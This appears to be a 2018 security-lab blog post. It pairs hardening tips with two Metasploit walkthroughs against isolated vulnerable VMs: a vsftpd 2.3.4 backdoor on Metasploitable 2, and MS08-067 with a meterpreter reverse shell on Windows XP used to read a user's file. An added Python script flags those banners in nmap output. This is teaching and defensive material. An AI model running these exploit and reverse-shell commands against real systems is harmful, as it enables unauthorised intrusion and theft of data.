Friday, September 21, 2018

Common practices to reduce your system's vulnerabilities.


  1.  Run regular vulnerability scans – it is recommended that you run a high-level scan on your system at least once a month.
  2.  Regularly patch and update your software – this will help you, as these patches usually fix vulnerabilities that the software providers have found.
  3. Practice the principle of least privilege – this minimizes the harm an attacker can do, because they cannot gain access to all the privileges within the system.
  4. When setting up the system, properly configure the network settings.
  5. Always keep your firewall on and have an updated antivirus running, as it provides a secondary firewall.
  6. Use and enforce a strong and secure password policy – this makes attacking the system harder and more discouraging if it takes too long.
  7. Always change the default passwords of network equipment.
  8. Make use of secure software development practices.


Using Metasploit to gain remote access to Metasploitable 2 server by creating a back door

Scenario 2

In this scenario we are trying to gain remote access to the Metasploitable 2 server by using Metasploit within Kali.
Step 1: Discover the Metasploitable server's IP address and open ports
This is done using the netdiscover command in the Linux terminal of Kali. After you have determined the IP address of the server, write it down for easy access later. In this instance the target's IP address is 192.168.152.129. To scan the server for open ports, use the nmap -n -sV 192.168.152.129 command.


Figure 16 - Finding open ports on metasploitable server

Step 2: Choose a port to exploit.
In this scenario we are trying to create a backdoor into the Metasploitable 2 server. Let us see what our options are on port 21 - vsftpd. To do this, start up the Metasploit console by entering the msfconsole command. After the console is open, enter search name:vsftpd into the terminal to see what exploits there are for port 21 – vsftpd.


Figure 17 - Available exploits for Port 21 – vsftpd

Perfect, we see that there is an exploit in Metasploit's library that we can use to create a backdoor into the system.
Step 3: Set up and run the exploit
For this step, enter the use exploit/unix/ftp/vsftpd_234_backdoor command and then the show options command to get a list of available options.


Figure 18 - Port 21 - vsftpd available options

This step shows us that we have to assign the RHOST property using the target's IP address and the following command: set RHOST 192.168.152.129. After this has been completed, enter the show payloads command to show a list of available payloads that we can use to exploit this port, then set the payload using set payload cmd/unix/interact and use the show options command to see if the payload has been set.


Figure 19 - Payload for port 21 vsftpd is set

After we have established this, we can use the exploit command to deliver the payload and create our backdoor.
As we can see in Figure 20, we can now remotely view and edit the content on the Metasploitable server.


Figure 20 - Gained remote access to Metasploitable server

Using Metasploit to remotely access a Windows XP computer and read files.


Scenario 1

A user using Windows XP is unaware of open ports on their system, leaving it vulnerable. The victim has a sensitive file in his My Documents folder. It is our objective to read it and discover the nature of the sensitive information within the file.
Step 1: Starting up our virtual machines
We will assume that the reader has prior knowledge of installing virtual machine software such as Oracle VirtualBox or VMware and setting up these virtual machines.
We will then create three virtual machines for our scenario: one target machine running Metasploitable 2; the Kali Linux machine that has the Metasploit Framework tool installed; and finally the other target machine, running Windows XP, that we will try to exploit.


Figure 1 - Virtual machines for scenario

Important notice: When running these machines, please change the network settings in your virtual machine software to run them on host-only connections. This is important because the machines we are using are vulnerable, and allowing them an internet connection to an unprotected network will leave us vulnerable to attack.
Once you have started up these three machines you should see the following screens.

Figure 2 - Windows XP target machine with sensitive file on desktop




Figure 3 - Metasploitable 2 running


Figure 4 - Linux Kali with terminal open

Step 2: Finding the IP address of the target
For the following steps we will be entering text commands into the Kali Linux terminal as shown in Figure 4 - Linux Kali with terminal open. By entering the command netdiscover we will be presented with a list of IP addresses.

Figure 5 - List of IP addresses

We have determined the target's IP address by comparing the known IP addresses to the list; the one that was still unknown was 192.168.152.128, thus this is the IP address of the target. You will want to write down the target's IP address for quick access to it.
Step 3: Scan the target IP address for open ports
For this step we enter the following command into our Linux terminal: nmap -n -sV <Target IP Address>. For this scenario we will be using nmap -n -sV 192.168.152.128 to scan the target's system for any open ports that we can exploit.

Figure 6 - nmap scan for open ports

Now we can see a list of the open ports on the target's system; write these down for later use. Note that the target is using Windows XP. This is important for the following step. As we will want to learn what


Step 3: Finding an exploit we can use
For this step we use the command msfconsole. This command will initialise an instance of the Metasploit package and allow us to access Metasploit's functionality.
On the msfconsole (msf>) line, type the following command:
msf> search platform:"Windows XP SP3" type:exploit
This will list the available exploits.
By doing an internet search and comparing the open ports with the available exploits, we see that we can use Port 455 combined with exploit/windows/smb/ms08_067_netapi.


Figure 7 - Finding exploit

We can now enter the exploit/windows/smb/ms08_067_netapi module by entering the msf> use exploit/windows/smb/ms08_067_netapi command, and then follow it up with the show options command to see what we can exploit using this package.


Figure 8 - List of exploits using package

Step 4: Setup the exploit
This exploit allows us to gain remote access to the target's computer.
Now we need to set the RHOST property of Metasploit so that it knows which system is being targeted. We do this with the set RHOST <Target IP Address> command; using the IP address we wrote down earlier, we can use set RHOST 192.168.152.128 to set our target.


Figure 9 - Set RHOST target IP Address

Now we need to set the payload that we will be using. This is done with the following command: set payload windows/meterpreter/reverse_tcp. To see if this worked, use the show options command again and check that it lists the payload options as follows:


Figure 10 - Payload armed

Now we need to set the LHOST and LPORT properties. LHOST will be the local Linux machine's IP address; we can get this from the ifconfig command in a new Linux terminal. For my instance this IP is 192.168.152.130, so we use set LHOST 192.168.152.130 and set LPORT 6666.
Now we launch the exploit, injecting our reverse shell “meterpreter” into the open port, by using the exploit command against the vulnerable target system. You will know it was successful when you see the following screen.


Figure 11 - Exploit launched meterpreter reverse shell running

Step 5: Using meterpreter post exploitation
For our scenario, our goal is to find a text document on the target’s desktop that contains sensitive information such as a password.
Now, by using meterpreter, we can navigate the target's filesystem. By entering the command shell we enter the native Windows XP command prompt. We then navigate to the user's My Documents folder using the cd c:\Documents and Settings\Administrator\My Documents command and use the DIR command to see a list of the files in the user's documents. We spot a text file named Sensitive_File.txt in the user's documents and decide to investigate this file.


Figure 12 - Browse target's file system


Figure 13 - Target's My Documents.

To read the contents of Sensitive_File.txt we can use the command more Sensitive_File.txt, and we have discovered a password the user has for some missile system.


Figure 14 - Using more command



Figure 15 - Target machine viewing the file
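
Both scenarios start from nmap -n -sV output, so a defender running the regular scans recommended in the list of common practices can check that same output for the two service banners the walkthroughs rely on. The Python script below is an added example, not part of the original post; the sample scan text is constructed, and the rule table, function name and recommended fixes are assumptions made for illustration.

```python
import re

# Constructed sample of `nmap -n -sV` output for the two lab hosts on this page.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.152.129
PORT    STATE  SERVICE VERSION
21/tcp  open   ftp     vsftpd 2.3.4
22/tcp  open   ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp  closed http

Nmap scan report for 192.168.152.128
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
"""

# Illustrative rule table (an assumption, not a complete vulnerability feed):
# regex over "<service> <version>", finding, recommended fix.
RULES = [
    (re.compile(r"\bvsftpd 2\.3\.4\b"),
     "vsftpd 2.3.4 banner (release targeted by vsftpd_234_backdoor)",
     "replace with a current vsftpd package from a verified source"),
    (re.compile(r"microsoft-ds.*Windows XP", re.I),
     "SMB exposed on Windows XP (targeted by ms08_067_netapi)",
     "apply the MS08-067 update or retire the host; firewall the SMB port"),
]

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def audit(scan_text):
    """Return one finding per open port whose banner matches a rule."""
    findings, host = [], None
    for line in scan_text.splitlines():
        if (m := HOST_RE.match(line)):
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if not m or m.group(3) != "open":
            continue  # header lines, blank lines, closed/filtered ports
        banner = f"{m.group(4)} {m.group(5)}".strip()
        for pattern, issue, fix in RULES:
            if pattern.search(banner):
                findings.append({"host": host, "port": int(m.group(1)),
                                 "issue": issue, "fix": fix})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SCAN):
        print(f"{f['host']}:{f['port']}  {f['issue']}  ->  {f['fix']}")
```

Rules match on the service banner rather than the port number, so a service moved to a non-default port is still reported; closed ports are skipped.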
